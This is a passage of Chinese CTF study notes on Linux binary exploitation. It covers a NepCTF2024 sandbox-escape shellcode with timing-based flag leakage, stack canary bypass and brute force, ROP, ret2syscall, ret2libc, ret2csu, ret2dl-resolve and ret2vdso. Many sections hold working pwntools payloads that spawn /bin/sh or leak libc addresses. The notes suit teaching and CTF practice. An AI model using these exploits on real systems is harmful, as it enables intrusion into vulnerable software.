ptrace(PTRACE_SETREGS, pid, 0LL, vg); // 设置子进程pid的寄存器值为vg内容
|
例子:NepCTF2024——NepBox
- 子进程:前提mmap了一段地址0xDEAD000,这段空间不仅可以布置shellcode,还可以在更高的地方存放泄露的flag内容,可以向该地址写入shellcode,且会由子进程执行
- 父进程:会在子进程调用系统调用前拦截并对系统调用运用白名单处理,,采用open,read,write到stdout获取flag值
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
case __NR_openat:
permission=rdx;
goto OpenFile;
case __NR_open:
permission=rsi; // rsi != 1
OpenFile:
if(permission){
ExitAndKillPid(pid);
}
break;
case __NR_read:
printf("read(%d,%p,0x%x);\n",rdi,rsi,rdx);
break;
case __NR_write:
choice=rand()%number;
regs.rsi=say[choice];
regs.rdx=strlen(say[choice]);
ptrace(PTRACE_SETREGS, pid, NULL, ®s); // 会更改rsi和rdx,flag输出换为其他内容
break;
|
汇编编写open, read, write shellcode+基于时间的盲注
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
|
from time import time # 用于时间盲注
p=process('./NepBox')
base=0xdead000
'''
/* open(file='/flag', oflag=0, mode=0) */
/* push b'/flag\x00' */
mov rax, 0x101010101010101
push rax
mov rax, 0x101010101010101 ^ 0x67616c662f /* '/flag' */
xor [rsp], rax /* 异或后恢复为/flag */
mov rdi, rsp
xor edx, edx /* 0 */
xor esi, esi /* 0 */
/* call open() */
push SYS_open /* 2 */
pop rax
syscall
'''
shellcode=shellcraft.open("/flag",0)+'''
/* call read(3, 0xdead200, 0x30) */
xor eax, eax /* SYS_read 0 */
push 3
pop rdi
push 0x30
pop rdx
mov esi, 0x1010101 /* 0x1010101 ^ 0xcebd301 = 233492992 == 0xdead200 */
xor esi, 0xcebd301
syscall
/*
stdout=1
for(int bytes=0;bytes<=0x30;bytes++){ iLoop
for(int bits=0;bits<=0x7;bits++){ jLoop
write(stdout,0xdead200+bits+bytes*8,0x1);
}
}
*/
mov r13,0 /* 偏移量——当前第几个字节:bytes */
mov r14,0xdead200 /* 基址 */
iLoop: /* 外层循环 遍历每个字节 */
mov r15,0 /* 当前字节第几位: bits */
jLoop: /* 内层循环 遍历每个位 */
lea rax,[r13+r14] /* rax内容置为r13+r14地址 */
mov ax,[rax] /* rax中地址指向的内容: 16位 */
mov rcx,r15 /* rcx 当前位 */
shr ax,cl /* 右移将最低位设置为要读取的位 */
and ax,1 /* & 0x00000001 取最低位的值 */
test ax,ax /* 检查当前位是 0 还是 1 */
jz zero
one: /* 进行基于时间的盲注,使得该位为1的时候时间为大于0秒 */
mov r8,0x200000000 /* 不同机器需要变更该延时时间 */
sleep:
sub r8,1
jnz sleep /* 延时操作 */
zero:
/* write(fd=1, buf=0xdead200+[r13], n=0x1) */
push 1
pop rdi
push 0x1
pop rdx
mov esi, 0x1010101 /* 233492992 == 0xdead200 */
xor esi, 0xcebd301
add rsi,r13
/* call write() */
push SYS_write /* 1 */
pop rax
syscall
jLoopEnd:
add r15,1 /*
cmp r15,7
jbe jLoop
iLoopEnd:
add r13,1
cmp r13,0x30
jbe iLoop
'''
p.sendafter('input',asm(shellcode))
flag=''
while len(flag)==0 or flag[-1]!='}':
s=0
for i in range(8):
now=time()
p.recvuntil('!')
interval=int(time()-now)
if interval: # 当时间差为 1 时
s|=(1<<i) # 在第 i 位上产生一个 1 加入到 s 中, 8 次构成一个字节
flag+=chr(s)
print(flag)
p.interactive()
|
Canary绕过
- 格式化字符串读取canary的值,canary最后一个值一定是"\x00",可以覆盖该值来用
%s
读取,然后栈溢出再覆盖为00
- Stack smashing:触发SSP Leak
- canary爆破,针对存在fork函数,复制出来的程序内存布局都一样,子进程报错退回父进程,canary不变
- 劫持
__stack_chk_fail
,修改got表中该函数地址
- 已知后门函数距起始位置地址0xabcd,则覆盖返回地址时只覆盖最低2字节,有1/16概率爆破成功
SSP Leak
1
2
3
4
5
6
|
#未修复
*** stack smashing detected ***: ./smashes terminated
#修复了bug
*** stack smashing detected ***: terminated
Aborted (core dumped)
|
- 低版本libc可以通过
__stack_chk_fail
该泄露出的地址进行操作
- canary检查不符合的时候引起程序终止时,会打印程序名,而程序名作为
arg[0]
即__libc_argv[0]
,存在于stack
上
- 故可以考虑覆盖
arg[0]
,实现泄露任意地址数据
1
2
3
4
5
6
7
8
9
10
11
12
|
//早期函数实现
void __attribute__ ((noreturn)) __stack_chk_fail (void)
{
__fortify_fail ("stack smashing detected");
}
void __attribute__ ((noreturn)) internal_function __fortify_fail (const char *msg)
{
/* The loop is added only to keep gcc happy. */
while (1)
__libc_message (2, "*** %s ***: %s terminated\n",
msg, __libc_argv[0] ?: "<unknown>");
}
|
gdb调试,需要覆盖数据为0x0的地址处,改为某个地址达成任意地址读,可以通过调试获取,覆盖为elf.sym['flag']
1
2
3
4
|
pwndbg> print &__libc_argv[0] #可以在gdb中找到地址
# p __libc_argv获取地址 tele addr查看
49:0248│ 0x7fffffffdf68 —▸ 0x7fffffffe293 ◂— '/home/xx/pwn'
4a:0250│ 0x7fffffffdf70 ◂— 0x0
|
通过cyclic获取所需值在cyclic生成的随机数中的偏移
1
2
3
|
cyclic 0x100
cyclic -l abcdef
# Found at offset xxx
|
逐字节爆破
漏洞点
1
2
3
4
5
6
|
while (1) {
pid_t pid = fork();
if (pid < 0) {break;}
else if (pid > 0) {wait(0);} // 父进程
else {vuln();} //子进程
}
|
利用:逐字节爆破
1
2
3
4
5
6
7
|
canary=b'\x00'
while len(canary) < 8:
for c in range(0x100):
p.send(b'a'*padding + canary + p8(c))
if not p.recvline_contains('stack smashing detected', timeout=1):
canary+=p8(c)
break
|
劫持函数
覆盖初始值
- 动态链接:TLS结构体所在内存可写,canary与libc基址有固定偏移
- 静态链接:TLS结构体在堆heap中,也可写
当malloc一段极大size的区域时,主要由mmap来实现,此时该区域将靠近libc,
ROP
Return Oriented Programming——返回导向编程:适用于NX 开启情况
amd64:构造覆盖栈
system |
/bin/sh |
pop_rdi_ret(previous return address) |
解析:ret时即(pop eip)此时栈顶为/bin/sh
,执行pop rdi
,/bin/sh
进入rdi
,继续ret到system
执行函数。
无 pop rdi 时
pop rdi
的机器码是 5f c3
,而 pop r15
的机器码是 41 5f c3
,且一般pop r15
之后一般都是紧跟ret指令
- 可以使用
pop r15
指令的后半部分,即 5f (pop rdi)
ret2syscall
系统调用:x86 通过 int 0x80
指令系统调用,amd64 通过 syscall
指令系统调用
32位
1
2
3
4
5
6
7
|
# x86
mov eax, 0xb ;系统调用号
mov ebx, ["/bin/sh"] ;参数
mov ecx, 0
mov edx, 0
int 0x80 ;中断号
# <==> execve("/bin/sh", NULL, NULL)
|
eax有时也可由函数返回值来控制,如alarm第一次调用返回上次设置的alarm的剩余时间0
存在大量的 pop xxx; ret
的指令,使得拼接这些gadget为payload
- 覆盖返回地址后运行到ret(pop eip),即将栈顶元素的值(指向gadget的地址)给eip,此时eip指向了gadget并执行gadget的内容(pop; ret),此时的pop仍然将栈上的值弹出,此时的栈为给指定的寄存器存入值,然后ret继续下一步操作,在Text段中的gadget中连续跳转,最终调用system call
- 可以找libc中的gadget(需要泄露libc基地址);也可以找程序中的gadget
构造栈:
int 0x80 address |
/bin/sh address |
0 |
0 |
pop_edx_ecx_ebx_ret address |
0xb |
pop_eax_ret address (previous ret address) |
1
2
3
|
#使用 flat 函数来构造 ROP字节流
payload = flat([ b'A'*(padding+0x4), pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, bin_sh, int_ret ])
# flat([gadget1, gadget2, gadget3])
|
- 若system传入的参数一定包括其他数据则可以填写
"||sh"
使得执行system("xxxx||sh")
64位
构造栈:使用linux系统调用
syscall address |
|
0 |
|
0 |
|
pop_rsi_rdx_ret address |
|
/bin/sh address |
|
pop_rdi_ret address |
|
0x3b |
(execve调用号) |
pop_rax_ret address |
(previous ret address) |
system无/bin/sh
可以通过栈溢出构造出read,将/bin/sh写入到bss段中,再system(bss_addr)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
elf = ELF("./pwn")
read_addr = elf.plt['read']
# 构造利用链
# read(0, bss_addr, 0x10)
payload = b'a'*padding + b'b'*ebp_padding
payload += p64(pop_rdi_ret) + p64(0)
payload += p64(pop_rdx_ret) + p64(bss_addr)
payload += p64(pop_rsi_ret) + p64(0x10)
payload += p64(read_addr)
# system(bss)
payload += p64(pop_rdi_ret) + p64(bss) + p64(system)
io.send(payload)
io.send("/bin/sh") # read函数读入到bss
|
ret2libc
漏洞点:
1
2
|
char s;// [esp+1Ch] [ebp-64h]
gets(&s);
|
思路:篡改栈帧上自返回地址开始的一段区域为一系列gadget地址,最终调用libc中的函数获取shell
通用形式:
32位 |
or |
64位 |
“/bin/sh” |
|
“/bin/sh” |
BBBB |
|
pop_ret |
system |
|
system |
32位
puts或write泄露libc基址:write(1,buf,20)
1
2
3
4
|
payload = 'a'*(padding+ebp) + write@plt + main + 1 + write@got + 20
# padding > 返回地址 > 预留返回地址 > arg1 > arg2 > arg3
payload = 'a'*(padding+ebp) + puts@plt + main + puts@got # elf.got['puts']
|
- 程序中存在system函数,plt表中可找到,plt表存在system可以直接用
- 32位程序传参是通过栈传参,用ROP在栈布置参数
构建栈:
0 |
【exit的参数】 |
“/bin/sh” address |
【传给system的是binsh的地址】 |
exit() |
【0xdeadbeef任意一个地址】 |
system@plt libc.sym[‘system’] |
【previous return address】 |
system@got → & system → system code
,ret的时候覆盖& system
地址
解释为何system
和"/bin/sh"
以及exit
和0
要相隔1字节:(也是ROP链)
- 返回地址覆盖为了
system
函数地址,通过 ret
即 pop eip
将system
地址 pop 给eip
寄存器,eip
指向system函数
- 执行system函数开头汇编为
push ebp; mov ebp, esp
,所以先向栈中push了一个ebp,之后便是将局部变量local var压入栈中
- 被调用函数一般寻找参数是从局部变量向上经过调用函数的ebp、返回地址后找参数arg1,2,3….,而此时刚好距离arg1——"/bin/sh"相差一个ebp和一个exit()函数,相隔2字节,即找到相应的参数
- 而之后exit()函数地址刚好为system原返回地址的位置,则继续同样操作达成ROP链利用
1
2
3
4
5
|
elf = ELF("./ret2libc")
bin_sh = next(elf.search(b"/bin/sh"))
system_plt = elf.plt["system"]
payload = b'A' * padding + p32(system_plt) + b'B' * 4 + p32(bin_sh)
|
无"/bin/sh"情况
- 需要使用ROP来gets用户输入的/bin/sh写入程序中的缓冲区中,再调用system函数
- 或找程序或libc文件中是否有sh或/bin/sh
- 找任何一个含有"sh"字符的字符串
- 获得shell权限也可通过
system($0)
实现,$0
在机器码中为\x24\x30
buf = “/bin/sh” |
buf |
system@plt |
gets@plt |
aaaaaaaaaa |
覆盖为get函数后,还需要手动输入"/bin/sh"最后会存储到buf中
1
2
|
io.send(b"/bin/sh\x00")
#加入\x00避免被阻塞
|
通过数值输入将/bin/sh
输入
1
|
send(str(u64(b'/bin/sh\x00')).encode()) # b'' -> int -> str -> b''
|
plt表中不存在system函数
- 无法直接使用,需要泄露出system函数的实际地址,泄露主GOT,攻击主PLT
- 泄露libc地址:通过其他的类似puts函数来泄露真实libc中puts的地址(
got
表地址)
- 本地存在libc文件而程序运行时,libc会被加载入内存的虚拟空间中,即使经过了映射,函数之间的偏移是一样的,puts地址获取后可以获取system函数地址
- 本地和远程libc版本可能不一样,且由于ASLR,泄露地址必须灵活
- 尝试
p64(pop_rdi) + p64(bin_sh) + p64(pop_rsi) + p64(0) + p64(execve)
程序不能返回puts在libc中的地址
1
2
3
4
5
6
7
8
9
10
11
|
# 32位
payload = b'a'*pad + b'aaaa' + p32(elf.symols["write"]) + p32(new_retn_address) + p32(1)
+ p32(elf.got["write"]) + p32(4) # 向标准输出写4个字节,输出write函数got表地址
# hex(u32(b'\xaa\xbb\xcc\xdd')) 获取泄露输出的十六进制地址
# 64位
payload = b'a'*pad + b'aaaaaaaa' + p64(pop_rdi_ret_addr) + p64(1) + p64(pop_rsi_r15_ret_addr) +
p64(write@got) + p64(0xdeadbeef) + p64(pop_rdx_ret_addr) + p(8) + p64(write@plt)
+ p64(new_retn_address)
# 0xdeadbeef传给r15,r15是多余的
# 8是给rdx的值,即写出一个字节
|
64位
二次运行
若只有一次gets需要覆盖返回地址进行二次运行,回到main或vuln函数
1
2
3
4
5
|
# 泄露puts_got表模板
puts_plt = elf.plt['puts']
puts_got = elf.got['puts'] # 泄露libc后更改为libc.sym['environ']可泄露栈附近地址
payload1 = b'a'* padding + p64(pop_rdi_addr) + p64(puts_got) + p64(puts_plt) + p64(vul_addr)
libc_base = leak_puts_addr - libc.sym['puts']
|
- 当
rdi
中存储libc
的固定偏移函数如funlockfile
时,覆盖返回地址为puts直接打印地址泄露libc地址
- 下一项由于puts无需参数直接填入main函数地址进行二次运行
1
2
3
4
|
# 获取libc基址 int(xxx, 16) 将十六进制转换为整型;接受数据直到\n并将\n丢弃drop
libcBase = int(io.recvuntil(b"\n", drop = True), 16) - libc.symbols["puts"]
# getshell
payload = flat(cyclic(60), libcBase + libc.symbols["system"], 0xdeadbeef, next(elf.search(b"sh\x00")))
|
system执行
- 程序需要栈平衡!
- 也可覆盖为one_gadget地址
system_address |
bin_sh_address |
pop_rdi_ret_address 覆盖返回地址 |
padding=buf_size + 0x8(rbp) |
1
2
|
payload = b'a'*padding + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
# 直接打入会发生段错误: 一般为指令 movaps xmmword ptr [rsp+0x50],xmm0
|
指令中表示rsp+0x50的地址需要与16字节对齐,16字节表示0x10,即此处的地址结尾应该为0而不是8,gdb查看:
1
2
3
4
|
pwndbg> p $rsp
$1 = (void *) 0x7ffeaf509298
pwndbg> p $rsp + 0x50
$2 = (void *) 0x7ffeaf5092e8
|
解决
为了对齐,只能让该地址加8或减8,且不影响payload的执行,pop rdi
和ret
,都让rsp
的地址递增,因此考虑利用ret
让rsp
的地址继续加8
1
2
|
payload = b'a'*padding + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
# 可在libc中ROPgadget找, 通过偏移计算地址, 若开启PIE不可找IDA中程序ret指令, 因为位置无关程序
|
此处不能使用system_addr+1解决,system第一个指令是endbr64
4字节而不是push rbp
1
2
3
4
5
6
|
Disassembly of section .plt.sec:
0000000000001050 <system@plt>:
1050: f3 0f 1e fa endbr64
1054: f2 ff 25 75 2f 00 00 bnd jmp QWORD PTR [rip+0x2f75] # 3fd0 <system@GLIBC_2.2.5>
105b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
|
ret2csu
amd64特有的一种利用手法,找不到控制rdx的gadget,条件不足以使用ret2libc
漏洞点
loc_4006A6
retn后跳转到loc_40690
,最终call [r12+rbx*8]
也可控,rbx为0则直接调用r12中函数,效果:任意函数调用
- 可以通过r13, r14, r15控制rdx, rsi, edi,需要rbp和rbx比较时相等,才不会死循环
1
2
3
4
5
6
7
8
|
# write 泄露地址
payload = b'a'*(padding+ebp) + p64(0x4006aa) \
# pop rbx rbp r12 r13 r14 r15
+ p64(0)+p64(1)+p64(elf.got['write'])+p64(8)+p64(elf.got['write'])+p64(1) \
+ p64(0x400690) \
# call r12 cmp时不进入循环继续执行0x4006a6, rsp将抬高8+6*8=56后ret返回地址
+ b'a'* 56 + p64(elf.sym['_start'])
# 后更换利用链getshell
|
ret2dl-resolve
相关结构
-
.dynamic
:ELF节中介绍
-
.dynsym
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
/* Symbol table entry. */
typedef struct
{
Elf32_Word st_name; /* Symbol name (string tbl index) 字符串相对于起始地址偏移 */
Elf32_Addr st_value; /* Symbol value 符号地址相对于模块基址的偏移 */
Elf32_Word st_size; /* Symbol size */
unsigned char st_info; /* Symbol type and binding st_other为0则设置为0x12 */
unsigned char st_other; /* Symbol visibility 决定函数参数link_map是否有效*/
// 值不为0则直接通过link_map信息计算目标函数地址, 否则调用_dl_lookup_symbol_x函数查询新的link_map, sym计算
Elf32_Section st_shndx; /* Section index */
} Elf32_Sym;
typedef struct
{
Elf64_Word st_name; /* Symbol name (string tbl index) */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;
|
-
.rel.plt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
/* Relocation table entry without addend (in section of type SHT_REL). */
typedef struct
{
Elf32_Addr r_offset; /* Address 加上传入参数link_map->l_addr等于该函数对应got表地址*/
Elf32_Word r_info; /* Relocation type and symbol index */
// 符号索引低8位(32)或低32位(64)设为7, 高24位(32)或高32位(64)即Sym构造的数组中的索引
} Elf32_Rel;
typedef struct
{
Elf64_Addr r_offset; /* Address */
Elf64_Xword r_info; /* Relocation type and symbol index */
} Elf64_Rel;
|
-
link_map
1
2
3
4
5
6
7
8
9
10
11
|
struct link_map
{
ElfW(Addr) l_addr; /* 目标函数基址 */
...
ElfW(Dyn) *l_info[DT_NUM+DT_THISPROCNUM+DT_VERSIONTAGNUM+DT_EXTRANUM+DT_VALNUM+DT_ADDRNUM];
/*
l_info: Dyn结构体指针
l_info[DT_STRTAB]: 第5项, 指向 .dynstr 对应 Dyn 字段
l_info[DT_SYMTAB]: 第6项, 指向 Sym 对应 Dyn 字段
l_info[DT_JMPREL]: 第23项, 指向 Rel 对应 Dyn 字段
*/
|
_dl_runtime_resolve 函数
为避免_dl_fixup
传参与目标函数传参干扰,_dl_runtime_resolve
通过栈传参然后转换成_dl_fixup
的寄存器传参
_dl_fixup函数
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
|
// 查找目标符号的地址,并将其填入到GOT表中
_dl_fixup(struct link_map *l, ElfW(Word) reloc_arg) {
// link_map访问.dynamic 获取符号表地址
const ElfW(Sym) *const symtab = (const void *) D_PTR (l, l_info[DT_SYMTAB]);
// link_map访问.dynamic 获取字符串表地址
const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);
// link_map访问.dynamic 获取具体符号函数对应的重定位表项结构地址,sizeof (PLTREL) 即 Elf*_Rel 的大小
#define reloc_offset reloc_arg * sizeof (PLTREL)
const PLTREL *const reloc = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
// 具体符号函数对应的符号表项结构地址(指针)
const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];
// 得到函数对应的got地址,即真实函数地址要填回的地址
void *const rel_addr = (void *) (l->l_addr + reloc->r_offset);
lookup_t result;
DL_FIXUP_VALUE_TYPE value;
// 判断重定位表的类型,必须要为 ELF_MACHINE_JMP_SLOT(7)
assert (ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT); // 【判断】
// ☆ 【关键判断,决定目标函数地址的查找方法】☆
if (__builtin_expect(ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) {
// link_map 无效: 32位利用
const struct r_found_version *version = NULL;
if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL) {// 处理符号版本信息
const ElfW(Half) *vernum = (const void *) D_PTR (l, l_info[VERSYMIDX(DT_VERSYM)]);
ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
version = &l->l_versions[ndx];
if (version->hash == 0)
version = NULL;
}
int flags = DL_LOOKUP_ADD_DEPENDENCY;
if (!RTLD_SINGLE_THREAD_P) {
THREAD_GSCOPE_SET_FLAG ();
flags |= DL_LOOKUP_GSCOPE_LOCK;
}
#ifdef RTLD_ENABLE_FOREIGN_CALL
RTLD_ENABLE_FOREIGN_CALL;
#endif
// 查找目标函数地址
// result 为 libc 的 link_map ,其中有 libc 的基地址
// sym 指针指向 libc 中目标函数对应的符号表,其中有目标函数在 libc 中的偏移
result = _dl_lookup_symbol_x(strtab + sym->st_name, l, &sym, l->l_scope,
version, ELF_RTYPE_CLASS_PLT, flags, NULL);
if (!RTLD_SINGLE_THREAD_P)
THREAD_GSCOPE_RESET_FLAG ();
#ifdef RTLD_FINALIZE_FOREIGN_CALL
RTLD_FINALIZE_FOREIGN_CALL;
#endif
// 基址 + 偏移最终算出目标函数地址 value
value = DL_FIXUP_MAKE_VALUE (result, sym ? (LOOKUP_VALUE_ADDRESS(result) + sym->st_value) : 0);
} else {
// link_map 有效, 即link_map 和 sym 中已是目标函数信息, 直接计算目标函数地址: 64位利用
value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
result = l;
}
value = elf_machine_plt_value(l, reloc, value);
if (sym != NULL
&& __builtin_expect(ELFW(ST_TYPE) (sym->st_info) == STT_GNU_IFUNC, 0))
value = elf_ifunc_invoke(DL_FIXUP_VALUE_ADDR (value));
if (__glibc_unlikely (GLRO(dl_bind_not)))
return value;
// 更新 got 表
return elf_machine_fixup_plt(l, result, reloc, rel_addr, value);
}
// 回到_dl_runtime_resolve调用目标函数
|
32位
利用:
- plt表调用
_dl_runtime_resolve
动态链接过程步骤5中:_dl_runtime_resolve(link_map_obj, reloc_offset)
的arg1 :link_map_obj
push 到栈中,此前的参数为arg2:reloc_offset
,需要栈迁移辅助
- ROP接下来伪造控制的是arg2,第二个参数,使其指向伪造的
Elf32_Rel
,_dl_runtime_resolve
函数按下标取值操作未进行越界检查
- 若
.dynamic
不可写,控制第二参数使其访问到可控内存,内存中伪造.rel.plt, .dynsym, .dynstr
,调用目标函数
1
2
|
# 先进行栈迁移, 调用read向fake_ebp读入rop数据
payload1 = b'a'*padding + fake_ebp_addr + read@plt + p64(leave_ret_addr) + p64(0) + p64(fake_ebp_addr) + p64(100)
|
利用:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
func_name = "system"
func_args = "/bin/sh"
resolve_plt = elf.get_section_by_name('.plt').header['sh_addr']
JMPREL = elf.dynamic_value_by_tag('DT_JMPREL')
SYMTAB = elf.dynamic_value_by_tag('DT_SYMTAB')
STRTAB = elf.dynamic_value_by_tag('DT_STRTAB')
fake_rel_addr = rop_addr + 5 * 4
reloc_offset = fake_rel_addr - JMPREL # 伪造参数指向fake Elf_Rel
fake_sym_addr = rop_addr + 7 * 4
align = (0x10 - ((fake_sym_addr - SYMTAB) & 0xF)) & 0xF
fake_sym_addr += align # 通过r_info指向sym地址, 逆向获取r_info和fake_rel值
r_info = (((fake_sym_addr - SYMTAB) // 0x10) << 8) | 0x7
# 0x7 means that Assertion `ELFW(R_TYPE)(reloc->r_info) == ELF_MACHINE_JMP_SLOT'
fake_rel = p32(elf.bss() + 0x10) + p32(r_info)
fake_name_addr = fake_sym_addr + 4 * 4 # 此处为system字符串位置
st_name = fake_name_addr - STRTAB # 伪造st_name使其指向system
fake_sym = p32(st_name) + p32(0) * 2 + p8(0x12) + p8(0) + p16(0) # 最终伪造fake Elf_Sym
# +3确保地址向上舍入到下一个 4 字节边界, &~3清除值的最低两位, 保证结果为4的倍数
bin_sh_offset = (fake_sym_addr + 0x10 - rop_addr + len(func_name) + 3) & ~3
bin_sh_addr = rop_addr + bin_sh_offset
payload = p32(0) # padding填充, 因为之后esp会指向fake_ebp+4
payload += p32(resolve_plt) # 实际为_dl_runtime_resolve前一条指令地址
# push dword ptr [_GLOBAL_OFFSET_TABLE_+4] <0x804c004> 参数1入栈
# jmp dword ptr [0x804c008] <_dl_runtime_resolve> 跳转到resolve函数
payload += p32(reloc_offset)
payload += p32(0) # 目标函数system的返回地址, 用不到, 填充
payload += p32(bin_sh_addr) # 目标函数的参数1
payload += fake_rel
payload += b'\x00' * align
payload += fake_sym
payload += func_name
payload = payload.ljust(bin_sh_offset, b'\x00')
payload += func_args + b'\x00'
|
- 栈迁移read读rop后跳转到
leave ret
地址,ebp此时指向fake_ebp
,执行后esp指向fake_ebp+8
,rip指向resolve前一条指令
- push resolve函数的第一个参数,且esp中已伪造第二个参数,跳转执行
_dl_runtime_resolve(link_map,reloc_arg)
- 进入后call执行
_dl_fixup
函数,最终调用system函数getshell
64位
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
n64 = lambda x: (x + 0x10000000000000000) & 0xFFFFFFFFFFFFFFFF # 将负数转换为正数
fake_link_map_addr = 0x404000 + 0x800
offset = n64(libc.sym['system'] - libc.sym['puts'])
fake_link_map = p64(offset) # l_addr
fake_link_map = fake_link_map.ljust(0x68, b'\x00')
fake_link_map += p64(elf.bss()) # l_info[5]需要为可读写的内存, .dynstr
fake_link_map += p64(fake_link_map_addr + 0x100) # l_info[6] Sym
fake_link_map = fake_link_map.ljust(0xf8, b'\x00')
fake_link_map += p64(fake_link_map_addr + 0x110) # l_info[23] Rel
fake_link_map += p64(0) + p64(elf.got['puts'] - 8) # Elf64_Dyn <-5
# - 8 使得前面的st_other大概率为非0
fake_link_map += p64(0) + p64(fake_link_map_addr + 0x120) # Elf64_Dyn <-6
fake_link_map += p64(n64(elf.bss() - offset)) + p32(7) + p32(0) # Elf64_Rel <-23
|
一:先栈溢出构造read函数向link_map地址读入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
sh_addr = fake_link_map_addr + len(fake_link_map) # /bin/sh字符串地址
resolve_plt = elf.get_section_by_name('.plt').header.sh_addr
payload1 = b''
payload1 += padding * b'\x00'
payload1 += p64(elf.search(asm('ret'), executable=True).__next__()) # ebp
payload1 += p64(elf.search(asm('pop rdi; ret'), executable=True).__next__())
payload1 += p64(0)
payload1 += p64(elf.search(asm('pop rsi; ret'), executable=True).__next__())
payload1 += p64(fake_link_map_addr)
payload1 += p64(elf.plt['read']) # rdx为数量可以直接用地址值
payload1 += p64(elf.search(asm('pop rdi; ret'), executable=True).__next__())
payload1 += p64(sh_addr)
payload1 += p64(resolve_plt + 6) # resolve@plt
payload1 += p64(fake_link_map_addr) # arg1: struct link_map *l
payload1 += p64(0) # arg2: ElfW(Word) reloc_arg
payload1 = payload1.ljust(0x200, b'\x00')
|
二:read读入fake_link_map
1
|
payload2 = fake_link_map + b'/bin/sh\x00'
|
ret2vdso
int 0x80
慢,会出现大量用户态和内核态切换的开销
- Intel和AMD分别实现了sysenter/sysexit和syscall/sysret快速系统调用指令,不同处理器架构实现不同指令会出现兼容问题,所以linux在
vdso
中实现了vsyscall
接口,具体选择由内核决定
ldd /bin/sh
可以发现linux-vdso.so.1
动态文件VDSO,
VDSO
- Virtual Dynamically-linked Shared Object,其将内核态的调用映射到用户地址空间的库上,可以看做一个
.so
动态库链接文件
- 不同内核vdso内容不同,VDSO中存在
syscall; ret
且随机化弱,对于32位系统有1/256
概率命中
- gdb vmmap可查看地址
intel
为例:
sysenter
:Ring3用户代码调用Ring0的系统内核代码;sysexit
:Ring0系统代码返回用户空间
- 执行
sysenter
指令的系统必须满足
- 目标Ring0代码段是平坦模式(Flat Mode)的4GB可读可执行的非一致代码段
- 目标Ring0堆栈段是平坦模式(Flat Mode)的4GB可读可写向上扩展的栈段
sysenter
指令不一定成对,不会把sysexit
所需返回地址压栈,sysexit
返回的地址也不一定是sysenter
指令下一个指令地址,sysenter/sysexit
指令跳转通过特殊寄存器实现,且用wrmsr
指令在Ring0中执行来设置寄存器,edx, eax
分别设置指定设置值的高32位和低32位,ecx指定填充的寄存器:
- SYSENTER_CS_MSR[0x174]:指定要执行的Ring0代码的代码段选择符
- SYSENTER_EIP_MSR[0x176]:指定要执行的Ring0代码的起始地址
- SYSENTER_ESP_MSR[0x175]:指定要执行的Ring0代码的栈指针
- 特性:Ring0和Ring3的代码段描述符、堆栈段描述符在全局描述符表GDT中顺序排列,即知道SYSENTER_CS_MSR指定的RIng0代码段描述符可推算RIng0堆栈段描述符及Ring3的代码段描述符和堆栈段描述符
Ring3代码调用sysenter,CPU:【调用前需要通过wrmsr指令已设置好Ring0代码信息】
- SYSENTER_CS_MSR值装载到 cs 寄存器
- SYSENTER_EIP_MSR值装载到 eip 寄存器
- SYSENTER_CS_MSR值+8(Ring0的堆栈段描述符)装载到 ss 寄存器
- SYSENTER_ESP_MSR值装载到 esp 寄存器
- 特权级切换为Ring0
- 若EFLAGS寄存器的VM标志被置位,则清除该标志
- 执行指定Ring0代码
Ring0代码执行完毕调用sysexit返回RIng3,CPU:【调用前保证edx,ecx正确性】
- SYSENTER_CS_MSR值+16(Ring3的代码段描述符)装载到 cs 寄存器
- edx 值装载到 eip 寄存器
- SYSENTER_CS_MSR值+24(Ring3的堆栈段描述符)装载到 ss 寄存器
- ecx 值装载到 esp 寄存器
- 特权级切换为Ring3
- 继续执行Ring3代码
AUXV辅助向量
1
2
|
$ LD_SHOW_AUXV=1 elf # whoami/ls
AT_SYSINFO_EHDR: 0x12345678 # vdso入口地址
|
获取VDSO
- 爆破
- 泄露
- ld.so中的
_libc_stack_end
找到stack真实地址,计算 ELF Auxiliary Vector Offset取出AT_SYSINFO_EHDR
- ld.so中的
_rtld_global_ro
某个偏移也有VDSO位置,gdb p查看_dl_auxv
, _dl_vdso_xxx
- 开了ASLR:x86只有1字节随机,暴力破解;x64开启了PIE有11字节随机,linux 3.18 2.2后有18字节随机
gdb> dump binary memory local_vdso_x32.so start_add end_addr
取出so文件查看
32位
